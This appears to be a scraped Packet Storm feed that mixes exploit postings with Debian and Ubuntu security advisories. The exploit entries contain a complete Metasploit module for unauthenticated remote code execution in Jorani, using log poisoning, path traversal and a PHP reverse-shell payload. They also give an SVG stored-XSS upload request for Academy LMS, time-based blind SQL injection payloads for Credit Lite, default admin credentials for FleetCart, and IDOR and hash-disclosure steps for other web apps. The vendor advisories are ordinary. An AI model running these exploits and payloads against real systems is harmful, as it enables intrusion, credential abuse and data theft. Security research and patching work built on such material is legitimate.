FlightPath LMS version 4.8.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 Insecure Direct Object Reference Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference vulnerability that allows an unauthorized administrative access.[+] Use payload : /tools/course-search/[+] http://127.0.0.1/getflightpathcom/sites/getflightpath/demo/4x/flightpath/tools/course-searchGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Insecure Direct Object Reference

FleetCart Laravel Ecommerce System version 1.1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : FleetCart - Laravel Ecommerce System v1.1.2 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826?s_rank=175                                 |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Payload : Email: admin@email.com & Password: 123456 [+] Panel : https://127.0.0.1/kingamesro/admin/mediaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FleetCart Laravel Ecommerce System 1.1.2 Insecure Settings

FixBook Repair Shop Management Tool version 2.2 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v2.2 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page.[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/epbuys.co.uk/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 2.2 Hash Disclosure

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Jorani versions prior to 1.0.2. It abuses log poisoning and redirection bypass via header spoofing and then it uses path traversal to trigger the vulnerability. It has been tested on Jorani 1.0.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Jorani unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.          It has been tested on Jorani 1.0.0.        },        'License' => MSF_LICENSE,        'Author' => [          'RIOUX Guilhem (jrjgjk)'        ],        'References' => [          ['CVE', '2023-26469'],          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']        ],        'Platform' => %w[php],        'Arch' => ARCH_PHP,        'Targets' => [          ['Jorani < 1.0.2', {}]        ],        'DefaultOptions' => {          'PAYLOAD' => 'php/meterpreter/reverse_tcp',          'RPORT' => 443,          'SSL' => true        },        'DisclosureDate' => '2023-01-06',        'Privileged' => false,        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])      ]    )  end  def get_version(res)    footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text    matches = footer_text.scan(/v([0-9.]+)/i)    if matches.nil? || matches[0].nil?      print_error('Cannot recovered Jorani version...')      return nil    end    matches[0][0]  end  def service_running(res)    matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/)    if matches.nil?      print_error("Jorani doesn't appear to be running on the target")      return false    end    true  end  def recover_csrf(res)    csrf_token = res.get_html_document.xpath('//input[@name="csrf_test_jorani"]/@value').text    return csrf_token if csrf_token.length == 32    nil  end  def check    # For the check command    print_status('Checking Jorani version')    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'uri' => "#{uri}/session/login"    )    if res.nil?      return Exploit::CheckCode::Safe('There was a problem accessing the login page')    end    return Exploit::CheckCode::Safe unless service_running(res)    print_good('Jorani seems to be running on the target!')    current_version = get_version(res)    return Exploit::CheckCode::Detected if current_version.nil?    print_good("Found version: #{current_version}")    current_version = Rex::Version.new(current_version)    return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')    Exploit::CheckCode::Safe  end  def exploit    # Main function    print_status('Trying to exploit LFI')    path_trav_payload = '../../application/logs'    header_name = Rex::Text.rand_text_alpha_upper(16)    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/session/login"    )    if res.nil?      print_error('There was a problem accessing the login page')      return    end    print_status('Recovering CSRF token')    csrf_tok = recover_csrf(res)    if csrf_tok.nil?      print_status('CSRF not found, doesn\'t mean its not vulnerable')    else      print_good("CSRF found: #{csrf_tok}")    end    print_status('Poisoning log with payload..')    print_status('Sending 1st payload')    send_request_cgi(      'method' => 'POST',      'keep_cookies' => true,      'uri' => "#{uri}/session/login",      'data' => "csrf_test_jorani=#{csrf_tok}&"                  \                'last_page=session/login&'                       \                "language=#{path_trav_payload}&"                 \                "login=#{Rex::Text.uri_encode(poison_payload)}&" \                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"    )    print_status("Including poisoned log file #{log_file_name}.php")    vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')    print_good('Triggering payload')    send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/pages/view/#{log_file_name}",      'headers' =>      {        'X-REQUESTED-WITH' => 'XMLHttpRequest',        header_name => Rex::Text.rand_text_alpha(14)      }    )    nil  endend

Jorani Remote Code Execution

Debian Linux Security Advisory 5481-1 - Multiple security issues were discovered in Fast DDS, a C++ implementation of the DDS (Data Distribution Service), which might result in denial of service or potentially the execution of arbitrary code when processing malformed RTPS packets.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5481-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 20, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : fastdds  
CVE ID         : CVE-2023-39534 CVE-2023-39945 CVE-2023-39946 CVE-2023-39947   
                 CVE-2023-39948 CVE-2023-39949

Multipe security issues were discovered in Fast DDS, a C++ implementation  
of the DDS (Data Distribution Service), which might result in denial of  
service or potentially the execution of arbitrary code when processing  
malformed RTPS packets.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.1.0+ds-9+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.9.1+ds-1+deb12u1.

We recommend that you upgrade your fastdds packages.

For the detailed security status of fastdds please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/fastdds

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTiT8EACgkQEMKTtsN8  
TjYjMRAAhNc26qPpZ0p9Jnbujlg6M6j1YFLLSv0wBH0bwG41mJthfVaB7pjPWhS1  
jABPZ8whfOwPXqigcXWSpDqVO0JrVzyI2uLtyrm0TNaf1y8extPrqQRL1epPNJvh  
AjXjX+CSRSSp20mEGr9bYg2a/FWnt60Vx+enyWd3xJE0KLucfkstNkD5cNv8Szxz  
I/Qnb5bnmjEE1UKzaZgOLaw1rciCAvlsmoORMqps+FxIXm1KqdGtLKBNta3Y/vrr  
QQMrK+oCsQkclQeC5Zm5BT6TNuRz7g6imEFP5bZCEkX0XNnZpF1tCSOSQ9z0CR3B  
4QuGhV8jIcArTwLEns5U3yZr8XgSqiXAoAdL8uVBZ1a67ZFktz2riKz8AYAQiBhj  
o58N4aYxjQnqw5h6OmIiuwl3QuYW1AhTQ5JyLNBrhBx/xBLznZtWkg5YBi3lzOVQ  
KIh7fOO0lzpkgXVgf4ggeBuF9K/8fes89QjlIN3PzUYiVAA/Uu0XpTCocBALlsKP  
rv5eZJkxKAyqrcCGzOBodhoMOKm+SeCKhrc/t2kQnD9G0MPk7eY/Gm26Oms0FHzE  
IR5gcPvnIQ0p+N2psu/YNxboeBrycxxN2nCnjAReO4U4kcfycOCG66ogTGWEEUb0  
/UbqHYjBiC3Z/wDzYtE8tni9HktHn0E1aYj5xgdtc4X92TioNrE=  
=ALwP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5481-1

Debian Linux Security Advisory 5480-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5480-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 18, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-4269 CVE-2022-39189 CVE-2023-1206 CVE-2023-1380  
                 CVE-2023-2002 CVE-2023-2007 CVE-2023-2124 CVE-2023-2269  
                 CVE-2023-2898 CVE-2023-3090 CVE-2023-3111 CVE-2023-3212  
                 CVE-2023-3268 CVE-2023-3338 CVE-2023-3389 CVE-2023-3609  
                 CVE-2023-3611 CVE-2023-3776 CVE-2023-3863 CVE-2023-4004  
                 CVE-2023-4128 CVE-2023-4132 CVE-2023-4147 CVE-2023-4194  
                 CVE-2023-4273 CVE-2023-20588 CVE-2023-21255 CVE-2023-21400  
                 CVE-2023-31084 CVE-2023-34319 CVE-2023-35788 CVE-2023-40283

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2022-4269

    William Zhao discovered that a flaw in the Traffic Control (TC)  
    subsystem when using a specific networking configuration  
    (redirecting egress packets to ingress using TC action "mirred"),  
    may allow a local unprivileged user to cause a denial of service  
    (triggering a CPU soft lockup).

CVE-2022-39189

    Jann Horn discovered that TLB flush operations are mishandled in the  
    KVM subsystem in certain KVM_VCPU_PREEMPTED situations, which may  
    allow an unprivileged guest user to compromise the guest kernel.

CVE-2023-1206

    It was discovered that the networking stack permits attackers to  
    force hash collisions in the IPv6 connection lookup table, which may  
    result in denial of service (significant increase in the cost of  
    lookups, increased CPU utilization).

CVE-2023-1380

    Jisoo Jang reported a heap out-of-bounds read in the brcmfmac Wi-Fi  
    driver. On systems using this driver, a local user could exploit  
    this to read sensitive information or to cause a denial of service.

CVE-2023-2002

    Ruiahn Li reported an incorrect permissions check in the Bluetooth  
    subsystem. A local user could exploit this to reconfigure local  
    Bluetooth interfaces, resulting in information leaks, spoofing, or  
    denial of service (loss of connection).

CVE-2023-2007

    Lucas Leong and Reno Robert discovered a time-of-check-to-time-of-  
    use flaw in the dpt_i2o SCSI controller driver. A local user with  
    access to a SCSI device using this driver could exploit this for  
    privilege escalation.

    This flaw has been mitigated by removing support for the I2OUSRCMD  
    operation.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-2898

    It was discovered that missing sanitising in the f2fs file  
    system may result in denial of service if a malformed file  
    system is accessed.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3111

    The TOTE Robot tool found a flaw in the Btrfs filesystem driver that  
    can lead to a use-after-free. It's unclear whether an unprivileged  
    user can exploit this.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3338

    Davide Ornaghi discovered a flaw in the DECnet protocol  
    implementation which could lead to a null pointer dereference or  
    use-after-free. A local user can exploit this to cause a denial of service  
    (crash or memory corruption) and probably for privilege escalation.

    This flaw has been mitigated by removing the DECnet protocol  
    implementation.

CVE-2023-3389

    Querijn Voet discovered a use-after-free in the io_uring subsystem,  
    which may result in denial of service or privilege escalation.

CVE-2023-3611

    It was discovered that an out-of-bounds write in the traffic control  
    subsystem for the Quick Fair Queueing scheduler (QFQ) may result in  
    denial of service or privilege escalation.

CVE-2023-3609 / CVE-2023-3776 / CVE-2023-4128

    It was discovered that a use-after-free in the cls_fw, cls_u32,  
    cls_route and network classifiers may result in denial of service or  
    potential local privilege escalation.

CVE-2023-3863

    It was discovered that a use-after-free in the NFC implementation  
    may result in denial of service, an information leak or potential  
    local privilege escalation.

CVE-2023-4004

    It was discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4132

    A use-after-free in the driver for Siano SMS1xxx based MDTV  
    receivers may result in local denial of service.

CVE-2023-4147

    Kevin Rich discovered a use-after-free in Netfilter when adding a  
    rule with NFTA_RULE_CHAIN_ID, which may result in local privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

CVE-2023-4194

    A type confusion in the implementation of TUN/TAP network devices  
    may allow a local user to bypass network filters.

CVE-2023-4273

    Maxim Suhanov discovered a stack overflow in the exFAT driver, which  
    may result in local denial of service via a malformed file system.

CVE-2023-20588

    Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Koepf and  
    Oleksii Oleksenko discovered that on some AMD CPUs with the Zen1  
    micro architecture an integer division by zero may leave stale  
    quotient data from a previous division, resulting in a potential  
    leak of sensitive data.

CVE-2023-21255

    A use-after-free was discovered in the in the Android binder driver,  
    which may result in local privilege escalation on systems where the  
    binder driver is loaded.

CVE-2023-21400

    Ye Zhang and Nicolas Wu discovered a double-free in the io_uring  
    subsystem, which may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-34319

    Ross Lagerwall discovered a buffer overrun in Xen's netback driver  
    which may allow a Xen guest to cause denial of service to the  
    virtualisation host my sending malformed packets.

CVE-2023-35788

    Hangyu Hua that an off-by-one in the Flower traffic classifier may  
    result in local of service or the execution of privilege escalation.

CVE-2023-40283

    A use-after-free was discovered in Bluetooth L2CAP socket handling.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.191-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTfvC5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QmDBAAnjvIhfwWPmYeanAyC9Hwdx2L9ATqx235c5K4I9xOWCRR+1oiM3WIKDz1  
jnFbRnCKEPMUeIMWaSwXj11OvjDIY31nnUqRzf/hoT8PQ6dHi1p/fpmjReLFL9sw  
FoYhyabKtkGMBUXF4dCz2Qn62yPGFDgupBMlK1BQ1kJvxZABaKG0PGTqqPX4iOla  
DkbNvwq2lLr0K6oYKp8Nu+tQ+1I6U8PI4EvAlYbybvo0WXvbZy9pOmBilJhBqYrC  
6Ql1ndovBzDi3H8Qo+C8WJRdFcjP+dBOpW/lu9EcHbNmHG1cWLO8EexqvfoW8GAV  
qf0CEtULUwsn6pM5uW+SEgfsiETFPXbzQt+FxH2L2NGLhLmb73dIK074/Ids8lx4  
V4tNh+pVTli+sTCB6uGaRQvM4uNTxm5mV9+saacM6vel6KvD/qRreCMCDhvk9CkS  
ETg3sJjbw/Hv83RwfqTlXicJh5KpA5JikrztMnHNAQKru93uSH6dOLpOd45/SeA8  
KHw604LkeuzAiqFltE76HS1h/jDXO0Mfb0UvIH5N1tmgcr3qaRaFvZQ6sYy8NTHa  
6N5pnfKJJXRuYe/aadjlC2xQmUMvU8HD39dqp6Z+XFjjzLmz5NN9rLHZKqaLSx6C  
IFId+FMkkKLeQFWylM+mA5WwiUTEx0JvREFPjtOjJ4RDHf3Mmws=  
=z/8h  
-----END PGP SIGNATURE-----

Debian Security Advisory 5480-1

Academy LMS version 6.1 suffers from an upload vulnerability that could lead to persistent cross site scripting attacks.

    # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 05/08/2023# Vendor: Creativeitem# Vendor Homepage: https://academylms.net/# Software Link: https://demo.academylms.net/# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server# CWE: CWE-79 - CWE-74 - CWE-707## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings3. Upload any Image into the [avatar]4. Capture the POST Request with [Burp Proxy Intercept]5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /wp-admin/async-upload.php HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS by CraCkEr");  </script></svg>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg[-] Done

Academy LMS 6.1 Cross Site Scripting / File Upload

Credit Lite version 1.5.4 suffers from a remote SQL injection vulnerability.

# Exploit Title: Credit Lite 1.5.4 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 31/07/2023  
# Vendor: Hobby-Tech  
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392  
# Software Link: https://credit-lite.appshat.xyz/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-4407  
# CWE: CWE-89 - CWE-74 - CWE-707

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

## Steps to Reproduce:

To Catch the POST Request

1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement

2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]

Path: /portal/reports/account_statement

POST  parameter 'date1' is vulnerable to SQL Injection  
POST  parameter 'date2' is vulnerable to SQL Injection

-------------------------------------------------------------------------  
POST /portal/reports/account_statement HTTP/2

_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001  
-------------------------------------------------------------------------

---  
Parameter: date1 (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001

Parameter: date2 (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001  
---

[-] Done

Credit Lite 1.5.4 SQL Injection

Ubuntu Security Notice 6303-1 - It was discovered that ClamAV incorrectly handled parsing HFS+ files. A remote attacker could possibly use this issue to cause ClamAV to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6303-1  
August 21, 2023

clamav vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

ClamAV could be made to crash if it opened a specially crafted file.

Software Description:  
- clamav: Anti-virus utility for Unix

Details:

It was discovered that ClamAV incorrectly handled parsing HFS+ files. A  
remote attacker could possibly use this issue to cause ClamAV to crash,  
resulting in a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   clamav                          0.103.9+dfsg-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   clamav                          0.103.9+dfsg-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   clamav                          0.103.9+dfsg-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
   https://ubuntu.com/security/notices/USN-6303-1  
   CVE-2023-20197

Package Information:  
   https://launchpad.net/ubuntu/+source/clamav/0.103.9+dfsg-0ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/clamav/0.103.9+dfsg-0ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/clamav/0.103.9+dfsg-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6303-1

Ubuntu Security Notice 6302-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS. It was discovered that Vim did not properly perform bounds checks in the diff mode in certain situations. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6302-1August 21, 2023vim vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 22.04 LTS. (CVE-2022-2522, CVE-2022-2580,CVE-2022-2817, CVE-2022-2819, CVE-2022-2862, CVE-2022-2889, CVE-2022-2982,CVE-2022-3134)It was discovered that Vim did not properly perform bounds checks in thediff mode in certain situations. An attacker could possibly use this issueto cause a denial of service. This issue only affected Ubuntu 18.04 LTS,Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-2598)It was discovered that Vim did not properly perform bounds checks incertain situations. An attacker could possibly use this issue to cause adenial of service. This issue only affected Ubuntu 22.04 LTS.(CVE-2022-2816)It was discovered that Vim incorrectly handled memory when skippingcompiled code. An attacker could possibly use this issue to cause a denialof service. This issue only affected Ubuntu 22.04 LTS. (CVE-2022-2874)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-3016,CVE-2022-3037)It was discovered that Vim incorrectly handled memory when invalid linenumber on ":for" is ignored. An attacker could possibly use this issue tocause a denial of service. (CVE-2022-3099)It was discovered that Vim incorrectly handled memory when passing invalidarguments to the assert_fails() method. An attacker could possibly use thisissue to cause a denial of service. This issue only affected Ubuntu 22.04LTS. (CVE-2022-3153)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.11  vim-athena                      2:8.2.3995-1ubuntu2.11  vim-gtk                         2:8.2.3995-1ubuntu2.11  vim-gtk3                        2:8.2.3995-1ubuntu2.11  vim-nox                         2:8.2.3995-1ubuntu2.11  vim-tiny                        2:8.2.3995-1ubuntu2.11  xxd                             2:8.2.3995-1ubuntu2.11Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.17  vim-athena                      2:8.1.2269-1ubuntu5.17  vim-gtk                         2:8.1.2269-1ubuntu5.17  vim-gtk3                        2:8.1.2269-1ubuntu5.17  vim-nox                         2:8.1.2269-1ubuntu5.17  vim-tiny                        2:8.1.2269-1ubuntu5.17  xxd                             2:8.1.2269-1ubuntu5.17Ubuntu 18.04 LTS (Available with Ubuntu Pro):  vim                             2:8.0.1453-1ubuntu1.13+esm4  vim-athena                      2:8.0.1453-1ubuntu1.13+esm4  vim-gtk                         2:8.0.1453-1ubuntu1.13+esm4  vim-gtk3                        2:8.0.1453-1ubuntu1.13+esm4  vim-runtime                     2:8.0.1453-1ubuntu1.13+esm4  vim-tiny                        2:8.0.1453-1ubuntu1.13+esm4  xxd                             2:8.0.1453-1ubuntu1.13+esm4Ubuntu 14.04 LTS (Available with Ubuntu Pro):  vim                             2:7.4.052-1ubuntu3.1+esm12  vim-athena                      2:7.4.052-1ubuntu3.1+esm12  vim-gtk                         2:7.4.052-1ubuntu3.1+esm12  vim-nox                         2:7.4.052-1ubuntu3.1+esm12  vim-tiny                        2:7.4.052-1ubuntu3.1+esm12In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6302-1  CVE-2022-2522, CVE-2022-2580, CVE-2022-2598, CVE-2022-2816,  CVE-2022-2817, CVE-2022-2819, CVE-2022-2862, CVE-2022-2874,  CVE-2022-2889, CVE-2022-2982, CVE-2022-3016, CVE-2022-3037,  CVE-2022-3099, CVE-2022-3134, CVE-2022-3153Package Information:  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.11  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.17

Source

Packet Storm